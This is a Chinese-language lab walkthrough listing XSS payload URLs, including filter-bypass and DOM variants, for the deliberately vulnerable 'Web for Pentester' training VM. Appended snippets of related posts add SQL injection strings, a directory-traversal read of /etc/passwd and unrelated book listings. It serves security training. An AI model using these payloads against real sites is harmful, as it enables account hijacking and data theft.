【渗透测试学习平台】 web for pentester -3.XSS

Example 1

http://192.168.91.139/xss/example1.php?name=hacker<script>alert(‘xss‘)</script>

Example 2

http://192.168.91.139/xss/example2.php?name=hacker<ScriPt>alert(‘xss‘)</ScriPt>

Example 3

http://192.168.91.139/xss/example3.php?name=hacker<scr<script>ipt>alert(‘xss‘)</scr</script>ipt>

Example 4

http://192.168.91.139/xss/example4.php?name=hacker1<img src="12" onerror=alert(‘xss‘) />

Example 5

http://192.168.91.139/xss/example5.php?name=hacker11<script>prompt(/xss/)</script>

Example 6

http://192.168.91.139/xss/example6.php?name=hacker";alert(/xss/);//

Example 7

http://192.168.91.139/xss/example7.php?name=hacker‘;alert(/xss/);//

Example 8

http://192.168.91.139/xss/example8.php/"method="POST"><script>alert(1)</script>

http://192.168.91.139/xss/example8.php/" onsubmit="alert(‘1‘)

Example 9

http://192.168.91.139/xss/example9.php#<script>alert(1)</script>

时间: 2024-10-27 17:03:49

【渗透测试学习平台】 web for pentester -3.XSS的相关文章

【渗透测试学习平台】 web for pentester -1.介绍与安装

web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术. 官网:https://www.pentesterlab.com 下载地址:https://www.pentesterlab.com/exercises/web_for_pentester_II 安装流程: 1.新建一个空白的虚拟机 2.选择web_for_pentester.iso,然后点击开始运行虚拟机即可. 3.网络设置,一般设置NAT自动获取ip即可,用ifconf

【渗透测试学习平台】 web for pentester -2.SQL注入

Example 1 字符类型的注入,无过滤 http://192.168.91.139/sqli/example1.php?name=root http://192.168.91.139/sqli/example1.php?name=root' and 1=1%23 http://192.168.91.139/sqli/example1.php?name=root' and 1=2%23 http://192.168.91.139/sqli/example1.php?name=root' uni

【渗透测试学习平台】 web for pentester -3.目录遍历

Example 1 http://192.168.106.154/dirtrav/example1.php?file=../../../../../../../etc/passwd Example 2 http://192.168.106.154/dirtrav/example2.php?file=/var/www/files/../../../../../../../etc/passwd 代码会检测是否包含/var/www/files/字符串 Example 3 http://192.168.

Android 渗透测试学习手册 第三章 Android 应用的逆向和审计

第三章 Android 应用的逆向和审计 作者:Aditya Gupta 译者:飞龙 协议:CC BY-NC-SA 4.0 在本章中,我们将查看 Android 应用程序或.apk文件,并了解其不同的组件. 我们还将使用工具(如 Apktool,dex2jar 和 jd-gui)来逆向应用程序. 我们将进一步学习如何通过逆向和分析源代码来寻找 Android 应用程序中的各种漏洞. 我们还将使用一些静态分析工具和脚本来查找漏洞并利用它们. 3.1 Android 应用程序拆解 Android 应

渗透测试学习

对于一个非计算机和网络专业的大学生,学习计算机和网络知识是比较枯燥的,缺乏专业的老师指导,没有系统的规划,也没有合适的项目练手,没有明确的目标,所以渗透测试(文明的说法)作为一项业余的业余爱好是有其存在必要的. 在学习渗透测试的过程中,能够加深对计算机和计算机网络体系的理解,作为反向思考,能够使我了解更多的技术要点和避免不不必要的安全漏洞. 渗透测试永无止境,它能提供一个尽情展现自我的平台,不断挑战自我,也可以与其他的高手交流PK,这种自由.挑战的精神是很重要的. 渗透测试同时是一份不错的工作,

Android 渗透测试学习手册 第八章 ARM 利用

第八章 ARM 利用 作者:Aditya Gupta 译者:飞龙 协议:CC BY-NC-SA 4.0 在本章中,我们将了解 ARM 处理器的基础知识,和 ARM 世界中存在的不同类型的漏洞. 我们甚至会继续利用这些漏洞,以便清楚了解整个场景. 此外,我们将研究不同的 Android root 攻击和它们在漏洞利用中的基本漏洞. 考虑到目前大多数 Android 智能手机都使用基于 ARM 的处理器,对于渗透测试人员来说,了解 ARM 及其附带的安全风险至关重要. 8.1 ARM 架构导论 AR

Kali Linux web渗透测试 学习笔记 1 系统安装

我是在虚拟机下进行安装的,虚拟机使用的是 virtualbox 5.0 首先,新建一个虚拟机,一路 next ,我将内存设置为 2G,改动了下保存的位置: 添加光盘后,启动画面如下: 因为好久木有直接用文本安装了所以选择了 Install 先是选择语言,然后地区然后root 密码设置, 分区, 配置源 最后完成安装: 中间过程就省略了.. 最后重启: 至此收工~

Android 渗透测试学习手册 翻译完成!

原书:Learning Pentesting for Android Devices 译者:飞龙 在线阅读 PDF格式 EPUB格式 MOBI格式 代码仓库 赞助我 协议 CC BY-NC-SA 4.0

《Web渗透测试使用kali linux》pdf

下载地址:网盘下载 内容简介 <Web渗透测试:使用Kali Linux>是一本Web渗透测试实践指南,全面讲解如何使用Kali Linux对Web应用进行渗透测试.两位安全领域的专家站在攻击者的角度,一步步介绍了渗透测试基本概念.Kali Linux配置方式,带大家了解如何收集信息并发现攻击目标,然后利用各种漏洞发起攻击,并在此基础之上学会渗透测试,掌握补救易受攻击系统的具体技术.此外,书中还给出了撰写报告的最佳实践,其中一些范例可作为撰写可执行报告的模板. <Web渗透测试:使用Ka